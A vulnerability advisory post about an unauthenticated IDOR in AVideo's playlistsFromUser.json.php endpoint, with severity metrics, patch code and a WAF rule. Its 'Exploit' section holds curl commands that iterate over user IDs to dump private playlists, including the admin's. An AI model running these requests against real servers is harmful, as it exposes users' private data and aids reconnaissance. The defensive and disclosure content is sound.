AVideo, IDOR, CVE-2026-????? (High)

Listen to this Post

The vulnerability is an Insecure Direct Object Reference (IDOR) found in the `/objects/playlistsFromUser.json.php` endpoint of the AVideo platform. The script accepts a `users_id` parameter via a GET request and directly passes it to the `PlayList::getAllFromUser()` database function without any prior authentication or ownership verification. The code checks if the parameter is empty but fails to call `User::isLogged()` or compare the requested ID against the logged-in user’s ID. This allows any unauthenticated remote attacker to manipulate the `users_id` parameter. By iterating through numeric user IDs, an attacker can retrieve the complete playlist data for every user on the platform, including private playlists like “Watch Later” and “Favorites.” The response discloses playlist names, associated video IDs, and status flags, leading to user enumeration and significant privacy violation. This information can be used to map out user interests and aid in further targeted attacks.

DailyCVE Form:

Platform: AVideo
Version: Latest
Vulnerability: IDOR Information Disclosure
Severity: High
date: March 2026

Prediction: Patch within 30 days

What Undercode Say:

Analytics:

  • Attack Vector: Network
  • Complexity: Low
  • Privileges Required: None
  • User Interaction: None

Exploit:

Enumerate user IDs and dump playlist data
for id in {1..10}; do
echo "[+] Checking User ID: $id"
curl -s "https://TARGET/objects/playlistsFromUser.json.php?users_id=$id" | jq '.'
done
Targeted exploit for admin (ID 1)
curl -v "https://TARGET/objects/playlistsFromUser.json.php?users_id=1"

Expected Response:

[
{"id":false,"name":"Watch Later","status":"watch_later","users_id":1},
{"id":false,"name":"Favorite","status":"favorite","users_id":1}
]

Protection:

// Add to objects/playlistsFromUser.json.php before query
if (!User::isLogged()) {
die(json_encode(['error' => 'Authentication required']));
}
if ($_GET['users_id'] != User::getId() && !User::isAdmin()) {
die(json_encode(['error' => 'Access denied']));
}
// If public playlists only
$row = PlayList::getAllFromUser($_GET['users_id'], false, 'public');

WAF Rule:

Block direct IDOR attempts
RewriteCond %{QUERY_STRING} users_id=[0-9]+
RewriteCond %{REQUEST_URI} /objects/playlistsFromUser.json.php
RewriteRule . - [F,L]

Impact:

  • Confidentiality: High (Private playlist data)
  • Integrity: None
  • Availability: None
  • Business Impact: Privacy violation, user enumeration, reconnaissance

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top